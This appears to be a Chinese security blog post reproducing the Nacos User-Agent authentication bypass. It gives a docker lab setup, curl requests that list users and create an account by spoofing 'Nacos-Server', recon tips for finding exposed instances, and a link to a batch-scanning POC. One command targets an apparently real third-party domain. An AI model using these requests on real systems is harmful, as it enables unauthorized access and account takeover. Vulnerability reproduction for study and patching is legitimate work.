NACOS身份认证绕过漏洞

目录

漏洞描述

影响版本

docker-compose文件一键搭建漏洞环境

漏洞复现

修复建议

漏洞挖掘

NACOS身份认证绕过漏洞批量检测POC


nacos:Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

漏洞描述

2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作

影响版本

  • <= Nacos 2.0.0-ALPHA.1
  • < Nacos 1.4.1

docker-compose文件一键搭建漏洞环境

使用nacos1.4.0版本(1.4.1不存在漏洞)的环境

下载并安装docker

docker-compose.yml文件内容如下

version: '3'
services:
  nacos:
    restart: always
    image: nacos/nacos-server:1.4.0
    container_name: nacos
    ports:
      - 8848:8848
    environment:
      MODE: standalone

执行docker-compose up -d启动漏洞环境

访问 http://192.168.xx.xx:8848/nacos/#/login

默认用户名密码 nacos,nacos

漏洞复现

1. 访问用户列表接口

http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9

或者使用curl工具

curl -XGET 'http://192.168.1.5:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9'

如出现下面的所示的页面,列出了所有登录的账号和密码说明存在漏洞

2. 向服务器添加一个新的账号和密码

访问nacos/v1,截取请求包,将GET请求换为POST,User-Agent值修改为:Nacos-Server

服务器返回创建用户成功

或者使用curl工具

curl -XPOST 'https://lingting.mininglamp.com/nacos/v1/auth/users?username=test&password=test'

3. 再次查看用户列表,发现多了一个我们添加的账户

4. 用创建的账号进行登录

修复建议

升级至最新版

漏洞挖掘

在最近的一次真实的渗透测试中发现了这个漏洞,其部署在阿里云系统上,那如何来发现这个漏洞了

1. 可以在网站域名如.com后面拼接nacos,查看有没有nacos这个服务

2. 再访问用户接口列表查看,若没有漏洞则为这样,状态码为401

 

NACOS身份认证绕过漏洞批量检测POC

https://download.csdn.net/download/qq_44159028/15451236

                                           

       ——心,若没有栖息的地方,到哪都是流浪

猜你喜欢

转载自blog.csdn.net/qq_44159028/article/details/114022477